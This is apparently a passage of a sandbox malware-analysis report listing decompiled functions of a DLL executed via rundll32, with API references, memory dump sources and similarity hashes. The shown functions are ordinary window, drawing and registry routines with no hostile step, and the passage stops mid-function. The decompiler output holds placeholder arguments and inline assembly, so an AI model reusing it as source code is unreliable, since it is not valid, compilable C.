                                                                                                        • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2169720751-0
                                                                                                        • Opcode ID: f4808f17725ff58dca5dc9f82ae09f75925c358e39b7e077e8b21e138b694c68
                                                                                                        • Instruction ID: a5ef11adb81990a86fef957e5b6122778ac3741d8be5c3d58e2427dd52398bce
                                                                                                        • Opcode Fuzzy Hash: f4808f17725ff58dca5dc9f82ae09f75925c358e39b7e077e8b21e138b694c68
                                                                                                        • Instruction Fuzzy Hash: 4021DB32600700EBDB22DF24CCC9B9A7BE5FF45781F184519F9869E5A0D772E9808B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001CA96, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001CA96(void* __eflags, struct tagRECT* _a4) {
				intOrPtr _v4;
				void* __ecx;
				intOrPtr _t28;
				void* _t32;
				long _t34;
				void* _t36;
				intOrPtr _t37;
				signed int _t38;

				_t37 = _t28;
				_v4 = _t37;
				_t36 = E1001C31C(_t28);
				_t32 = E1001C1A3(_t36, 0);
				if(_t32 == 0 || _t32 == _t37) {
					_t38 = GetWindowLongA( *(_t36 + 0xd4), 0xffffffec);
					if(_t32 == 0 || (E1001164C(_v4) & 0x00000200) != 0 || (E10011632(_v4) & 0x01000000) == 0) {
						_t34 = _t38 | 0x00000200;
					} else {
						_t34 = _t38 & 0xfffffdff;
					}
					if(_t38 == _t34) {
						goto L11;
					} else {
						RedrawWindow( *(_t36 + 0xd4), 0, 0, 0x81);
						SetWindowLongA( *(_t36 + 0xd4), 0xffffffec, _t34);
						SetWindowPos( *(_t36 + 0xd4), 0, 0, 0, 0, 0, 0x137);
						if(_a4 != 0) {
							GetClientRect( *(_t36 + 0xd4), _a4);
						}
						return 1;
					}
				} else {
					L11:
					return 0;
				}
			}











                                                                                                        0x1001ca9a
                                                                                                        0x1001ca9d
                                                                                                        0x1001caa6
                                                                                                        0x1001cab2
                                                                                                        0x1001cab6
                                                                                                        0x1001cad0
                                                                                                        0x1001cad2
                                                                                                        0x1001caff
                                                                                                        0x1001caf3
                                                                                                        0x1001caf5
                                                                                                        0x1001caf5
                                                                                                        0x1001cb07
                                                                                                        0x00000000
                                                                                                        0x1001cb09
                                                                                                        0x1001cb16
                                                                                                        0x1001cb25
                                                                                                        0x1001cb3b
                                                                                                        0x1001cb45
                                                                                                        0x1001cb51
                                                                                                        0x1001cb51
                                                                                                        0x00000000
                                                                                                        0x1001cb59
                                                                                                        0x1001cb5c
                                                                                                        0x1001cb5c
                                                                                                        0x00000000
                                                                                                        0x1001cb5c

                                                                                                        APIs
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(?), ref: 1001C326
                                                                                                          • Part of subcall function 1001C31C: GetParent.USER32(00000000), ref: 1001C329
                                                                                                        • GetWindowLongA.USER32 ref: 1001CAC8
                                                                                                        • RedrawWindow.USER32(?,00000000,00000000,00000081,?,?,?,?,?,1001CB82,?), ref: 1001CB16
                                                                                                        • SetWindowLongA.USER32 ref: 1001CB25
                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137,?,?,?,?,?,1001CB82,?), ref: 1001CB3B
                                                                                                        • GetClientRect.USER32 ref: 1001CB51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongParent$ClientRectRedraw
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 556606033-440804003
                                                                                                        • Opcode ID: a1e961ae3e619d6220d38881e3573a291ef958478b30ab9cc7b27e67c7c3e49f
                                                                                                        • Instruction ID: 9a90b59bb855af4e0f99b740ed672d0e13458d5cacb073f3e751edc265b8d43f
                                                                                                        • Opcode Fuzzy Hash: a1e961ae3e619d6220d38881e3573a291ef958478b30ab9cc7b27e67c7c3e49f
                                                                                                        • Instruction Fuzzy Hash: 4811C47210834C6FE711EF64CCC5E6F7ADAEF80294F11052DF662AA0A1CB71DD8087A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100381E5, Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E100381E5(void* __ecx) {
				struct tagMSG _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				int _t31;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					__eflags = _t21;
					if(__eflags != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				_t36 =  *((intOrPtr*)(_t24 + 0x84));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x84));
				 *(_t39 + 0x78) =  *(_t24 + 0x80) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E1000E5E5(0,  *((intOrPtr*)(_t24 + 0x84)), _t40, GetDesktopWindow());
				_t31 = LockWindowUpdate( *(_t38 + 0x20));
				_t43 = _t31;
				if(_t31 == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x20), 0, ??));
				_t33 = E10008F77(0, _t36, _t38, _t39, _t43);
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}















                                                                                                        0x100381f4
                                                                                                        0x100381f7
                                                                                                        0x100381f9
                                                                                                        0x1003821e
                                                                                                        0x10038204
                                                                                                        0x1003820a
                                                                                                        0x1003820c
                                                                                                        0x10038217
                                                                                                        0x1003821d
                                                                                                        0x00000000
                                                                                                        0x1003821d
                                                                                                        0x100382a3
                                                                                                        0x100382a3
                                                                                                        0x1003822c
                                                                                                        0x1003822f
                                                                                                        0x10038235
                                                                                                        0x10038243
                                                                                                        0x1003824a
                                                                                                        0x10038250
                                                                                                        0x10038253
                                                                                                        0x10038256
                                                                                                        0x10038259
                                                                                                        0x1003825c
                                                                                                        0x1003826e
                                                                                                        0x10038273
                                                                                                        0x10038279
                                                                                                        0x1003827b
                                                                                                        0x10038284
                                                                                                        0x1003827d
                                                                                                        0x1003827d
                                                                                                        0x1003827d
                                                                                                        0x10038290
                                                                                                        0x10038291
                                                                                                        0x10038296
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetMessageA.USER32 ref: 10038204
                                                                                                        • DispatchMessageA.USER32 ref: 10038217
                                                                                                        • PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10038226
                                                                                                        • SetRectEmpty.USER32(?), ref: 1003824A
                                                                                                        • GetDesktopWindow.USER32 ref: 10038262
                                                                                                        • LockWindowUpdate.USER32(?,00000000), ref: 10038273
                                                                                                        • GetDCEx.USER32(?,00000000,00000003), ref: 1003828A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1192691108-0
                                                                                                        • Opcode ID: c7f3a9e97e145176bb155e51446f7cfd36a903232068b7cec5f48ecb4c1882fa
                                                                                                        • Instruction ID: 0518f276ba964af6d84b4b87a562fad982e1a1829898d8337b2e8ffce52ff791
                                                                                                        • Opcode Fuzzy Hash: c7f3a9e97e145176bb155e51446f7cfd36a903232068b7cec5f48ecb4c1882fa
                                                                                                        • Instruction Fuzzy Hash: 57213371500B05AFE711DF65CC88E677BECFB04285F05096EFA45D6521EB35EA048B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001BCC2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001BCC2(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                        0x1001bcdd
                                                                                                        0x1001bce4
                                                                                                        0x1001bce7
                                                                                                        0x1001bcea
                                                                                                        0x1001bced
                                                                                                        0x1001bcf8
                                                                                                        0x1001bd2f
                                                                                                        0x1001bd2f
                                                                                                        0x1001bd3a
                                                                                                        0x1001bd3f
                                                                                                        0x1001bd3f
                                                                                                        0x1001bd44
                                                                                                        0x1001bd49
                                                                                                        0x1001bd49
                                                                                                        0x1001bd52

                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1001BCF0
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD13
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD2F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1001BD3F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 1001BD49
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreate$Open
                                                                                                        • String ID: software
                                                                                                        • API String ID: 1740278721-2010147023
                                                                                                        • Opcode ID: fe647fdf49ef220c3fd35909b2e2998ceb588bdbf99c8fab707d520cad160355
                                                                                                        • Instruction ID: a0fbfe7504193fb7f9e2b6d6b11f75e844a94851742b3b56719e4681f93b2284
                                                                                                        • Opcode Fuzzy Hash: fe647fdf49ef220c3fd35909b2e2998ceb588bdbf99c8fab707d520cad160355
                                                                                                        • Instruction Fuzzy Hash: 4C110676D00159FBDB11DB9ACC88DDFBFFCEF89740B1040AAE501A6121E3709A44DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000C776, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 1000C782
                                                                                                        • GetWindowRect.USER32 ref: 1000C79D
                                                                                                        • ScreenToClient.USER32 ref: 1000C7B0
                                                                                                        • ScreenToClient.USER32 ref: 1000C7B9
                                                                                                        • EqualRect.USER32 ref: 1000C7C3
                                                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 1000C7EB
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 1000C7F5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                                                        • String ID:
                                                                                                        • API String ID: 443303494-0
                                                                                                        • Opcode ID: b94fce1a0bde8a826347b62c6e8f275f950f89a328fe2f1b8d2853b90cb18fb6
                                                                                                        • Instruction ID: 48e29e304c3a4b7487bb55b9a5c17609bca1f45d73b5d7918b2b35c714da091a
                                                                                                        • Opcode Fuzzy Hash: b94fce1a0bde8a826347b62c6e8f275f950f89a328fe2f1b8d2853b90cb18fb6
                                                                                                        • Instruction Fuzzy Hash: 9811F47650021AAFE710DF65DC84DAB7BBDEF88350B108429FD55E3155D730A911CF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100388CF, Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 100381E5: PeekMessageA.USER32(00000000,00000000,0000000F,0000000F,00000000), ref: 10038226
                                                                                                          • Part of subcall function 100381E5: SetRectEmpty.USER32(?), ref: 1003824A
                                                                                                          • Part of subcall function 100381E5: GetDesktopWindow.USER32 ref: 10038262
                                                                                                          • Part of subcall function 100381E5: LockWindowUpdate.USER32(?,00000000), ref: 10038273
                                                                                                          • Part of subcall function 100381E5: GetDCEx.USER32(?,00000000,00000003), ref: 1003828A
                                                                                                          • Part of subcall function 10008810: GetModuleHandleA.KERNEL32(GDI32.DLL,?,100388F6), ref: 10008818
                                                                                                          • Part of subcall function 10008810: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10008824
                                                                                                        • GetWindowRect.USER32 ref: 1003891C
                                                                                                          • Part of subcall function 10008846: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10038903,00000000), ref: 1000884F
                                                                                                          • Part of subcall function 10008846: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,10038903,00000000), ref: 1000885D
                                                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10038A0E
                                                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10038BB4
                                                                                                          • Part of subcall function 100380BD: OffsetRect.USER32(?,?,?), ref: 100380F4
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 1003842C
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 10038436
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 10038440
                                                                                                          • Part of subcall function 10038403: OffsetRect.USER32(?,?,?), ref: 1003844A
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 100387C5
                                                                                                          • Part of subcall function 100387B4: SetCapture.USER32(?), ref: 100387D5
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 100387E1
                                                                                                          • Part of subcall function 100387B4: GetMessageA.USER32 ref: 100387FB
                                                                                                          • Part of subcall function 100387B4: DispatchMessageA.USER32 ref: 1003882D
                                                                                                          • Part of subcall function 100387B4: GetCapture.USER32 ref: 1003888B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Offset$Capture$MessageWindow$AddressHandleInflateModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1062258019-0
                                                                                                        • Opcode ID: 2d653a25a98ae8d2332fc53cbc84837d60d60e382b7a049b87c018ddb779d706
                                                                                                        • Instruction ID: 0ccee5dc33a989faf55df8631e11426c58213659a7abf0a6825cd71ee695ccf4
                                                                                                        • Opcode Fuzzy Hash: 2d653a25a98ae8d2332fc53cbc84837d60d60e382b7a049b87c018ddb779d706
                                                                                                        • Instruction Fuzzy Hash: 05B14876900219AFCF06DFA8C885EEE7BBAFF4A311F004594FD05AF255D671AA44CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002DDA9, Relevance: 9.2, APIs: 6, Instructions: 230windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1002DDA9(intOrPtr* __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				intOrPtr* _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t103;
				signed int _t118;
				int _t123;
				signed int _t139;
				signed int _t141;
				signed int _t152;
				intOrPtr* _t161;
				intOrPtr* _t182;
				void* _t192;
				signed int _t195;
				intOrPtr* _t199;

				_t192 = __edx;
				_t161 = _a4;
				_v12 = __ecx;
				 *((intOrPtr*)( *_t161 + 0x1c))();
				 *((intOrPtr*)( *_t161 + 0x34))(1);
				 *((intOrPtr*)( *_t161 + 0x38))( &_v20, 0, 0);
				E10008BD3(_t161,  &_v20, 0, 0);
				_t194 =  &_v36;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t168 =  &_v36;
				asm("movsd");
				E1002D766( &_v36);
				_t199 = _v12;
				_t103 =  *(_t199 + 4);
				_v8 = _v8 & 0x00000000;
				_a4 = _a4 & 0x00000000;
				if((_t103 & 0x00000003) != 0) {
					_t202 = _t103 & 0x00000002;
					if((_t103 & 0x00000002) == 0) {
						_t152 =  *((intOrPtr*)( *_t161 + 0x24))(7);
					} else {
						_push( *0x100991d4);
						_t152 = E10009357(_t161, E10009228(_t161,  &_v36,  &_v36, _t199, _t202));
					}
					_v8 = _t152;
					_a4 =  *((intOrPtr*)( *_t161 + 0x24))(5);
					_t194 = E10008617(_t161, 0xd);
					InflateRect( &_v36, 1, 1);
					E100013A0(_t161, _v36.left, _v36.top, _v36.right, _v36.bottom);
					_t168 = _t161;
					E10008617(_t161, _t155);
				}
				if(( *(_t199 + 4) & 0x00000024) != 0) {
					UnrealizeObject( *0x100991d0);
				}
				if(( *(_t199 + 4) & 0x00000020) != 0) {
					_t182 = _t161;
					_t139 =  *((intOrPtr*)( *_t161 + 0x24))(8);
					_t205 = _v8;
					if(_v8 == 0) {
						_v8 = _t139;
					}
					_push( *0x100991d0);
					_t141 = E10009357(_t161, E10009228(_t161, _t182, _t194, _t199, _t205));
					if(_a4 == 0) {
						_a4 = _t141;
					}
					E100085BB(_t161, 1);
					_t194 = E10008617(_t161, 3);
					E100013A0(_t161, _v36.left + 1, _v36.top + 1, _v36.right, _v36.bottom);
					_t168 = _t161;
					E10008617(_t161, _t143);
				}
				_t208 =  *(_t199 + 4) & 0x00000004;
				if(( *(_t199 + 4) & 0x00000004) != 0) {
					_push( *0x100991d0);
					_t118 = E10009357(_t161, E10009228(_t161, _t168, _t194, _t199, _t208));
					if(_a4 == 0) {
						_a4 = _t118;
					}
					E100085BB(_t161, 2);
					E1002DA71(_t199,  &_v52);
					_t123 = _v44 - _v52;
					_v16 = _t123;
					PatBlt( *(_t161 + 4), _v52, _v48, _t123, _v36.top - _v48, 0xf0001);
					PatBlt( *(_t161 + 4), _v52, _v36.bottom, _v16, _v40 - _v36.bottom, 0xf0001);
					PatBlt( *(_t161 + 4), _v52, _v36.top, _v36.left - _v52, _v36.bottom - _v36.top, 0xf0001);
					PatBlt( *(_t161 + 4), _v36.right, _v36.top, _v44 - _v36.right, _v36.bottom - _v36.top, 0xf0001);
					_t199 = _v12;
				}
				if(( *(_t199 + 4) & 0x00000018) != 0) {
					_v16 =  *((intOrPtr*)( *_t199 + 0xc))();
					_t195 = 0;
					do {
						if((_v16 & 1 << _t195) != 0) {
							E1002DAC3(_t199, _t192, _t195,  &_v36);
							E10021614(_t161,  &_v36, 0);
						}
						_t195 = _t195 + 1;
					} while (_t195 < 8);
				}
				if(_v8 != 0) {
					E10009357(_t161, _v8);
				}
				if(_a4 != 0) {
					E10009357(_t161, _a4);
				}
				return  *((intOrPtr*)( *_t161 + 0x20))(0xffffffff);
			}



























                                                                                                        0x1002dda9
                                                                                                        0x1002ddb0
                                                                                                        0x1002ddbb
                                                                                                        0x1002ddbe
                                                                                                        0x1002ddc7
                                                                                                        0x1002ddd6
                                                                                                        0x1002dde1
                                                                                                        0x1002dde9
                                                                                                        0x1002ddec
                                                                                                        0x1002dded
                                                                                                        0x1002ddee
                                                                                                        0x1002ddef
                                                                                                        0x1002ddf2
                                                                                                        0x1002ddf3
                                                                                                        0x1002ddf8
                                                                                                        0x1002ddfb
                                                                                                        0x1002ddfe
                                                                                                        0x1002de02
                                                                                                        0x1002de08
                                                                                                        0x1002de0a
                                                                                                        0x1002de0c
                                                                                                        0x1002de29
                                                                                                        0x1002de0e
                                                                                                        0x1002de0e
                                                                                                        0x1002de1c
                                                                                                        0x1002de1c
                                                                                                        0x1002de2c
                                                                                                        0x1002de3c
                                                                                                        0x1002de46
                                                                                                        0x1002de4e
                                                                                                        0x1002de62
                                                                                                        0x1002de68
                                                                                                        0x1002de6a
                                                                                                        0x1002de6a
                                                                                                        0x1002de73
                                                                                                        0x1002de7b
                                                                                                        0x1002de7b
                                                                                                        0x1002de85
                                                                                                        0x1002de8b
                                                                                                        0x1002de8d
                                                                                                        0x1002de90
                                                                                                        0x1002de94
                                                                                                        0x1002de96
                                                                                                        0x1002de96
                                                                                                        0x1002de99
                                                                                                        0x1002dea7
                                                                                                        0x1002deb0
                                                                                                        0x1002deb2
                                                                                                        0x1002deb2
                                                                                                        0x1002deb9
                                                                                                        0x1002deca
                                                                                                        0x1002dedb
                                                                                                        0x1002dee1
                                                                                                        0x1002dee3
                                                                                                        0x1002dee3
                                                                                                        0x1002dee8
                                                                                                        0x1002deec
                                                                                                        0x1002def2
                                                                                                        0x1002df00
                                                                                                        0x1002df09
                                                                                                        0x1002df0b
                                                                                                        0x1002df0b
                                                                                                        0x1002df12
                                                                                                        0x1002df1d
                                                                                                        0x1002df2b
                                                                                                        0x1002df3f
                                                                                                        0x1002df48
                                                                                                        0x1002df5e
                                                                                                        0x1002df78
                                                                                                        0x1002df92
                                                                                                        0x1002df94
                                                                                                        0x1002df94
                                                                                                        0x1002df9b
                                                                                                        0x1002dfa4
                                                                                                        0x1002dfa7
                                                                                                        0x1002dfa9
                                                                                                        0x1002dfb5
                                                                                                        0x1002dfbe
                                                                                                        0x1002dfcb
                                                                                                        0x1002dfcb
                                                                                                        0x1002dfd0
                                                                                                        0x1002dfd1
                                                                                                        0x1002dfa9
                                                                                                        0x1002dfda
                                                                                                        0x1002dfe1
                                                                                                        0x1002dfe1
                                                                                                        0x1002dfea
                                                                                                        0x1002dff1
                                                                                                        0x1002dff1
                                                                                                        0x1002e003

                                                                                                        APIs
                                                                                                          • Part of subcall function 10008BD3: SetWindowOrgEx.GDI32(?,?,00000000,?), ref: 10008BF2
                                                                                                          • Part of subcall function 10008BD3: SetWindowOrgEx.GDI32(?,?,00000000,?), ref: 10008C05
                                                                                                        • InflateRect.USER32(?,00000001,00000001), ref: 1002DE4E
                                                                                                        • UnrealizeObject.GDI32(?), ref: 1002DE7B
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF48
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF5E
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF78
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,000F0001), ref: 1002DF92
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,00000000), ref: 10009379
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,?), ref: 1000938F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$SelectWindow$H_prolog3_catchInflateRectUnrealize
                                                                                                        • String ID:
                                                                                                        • API String ID: 336483043-0
                                                                                                        • Opcode ID: 05e2c13a02fd9c4a7fe415c9f1db73316c3b3c725aba90784ffd98a7d8e33aa6
                                                                                                        • Instruction ID: 028808ddba6787b9c4fd4b983e7c69789ce85a61de09a4b4a44f0d5935b0aef6
                                                                                                        • Opcode Fuzzy Hash: 05e2c13a02fd9c4a7fe415c9f1db73316c3b3c725aba90784ffd98a7d8e33aa6
                                                                                                        • Instruction Fuzzy Hash: F5810975A00219AFDF05DFA8CD85EAEBBB5FF48340F054069F906AB296CB75AD04CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10018B13, Relevance: 9.2, APIs: 6, Instructions: 229windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10018B13(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t57;
				int _t59;
				int _t61;
				int _t63;
				int _t65;
				int _t67;
				void* _t69;
				void* _t77;
				int _t78;
				void* _t81;
				void* _t85;
				void* _t89;
				intOrPtr _t95;
				int _t98;
				int _t103;
				intOrPtr* _t108;
				int _t117;
				void* _t121;
				int _t122;
				int _t123;
				int _t145;
				void* _t156;
				int* _t157;
				intOrPtr* _t158;
				intOrPtr _t159;
				int _t160;
				intOrPtr* _t161;
				intOrPtr* _t162;
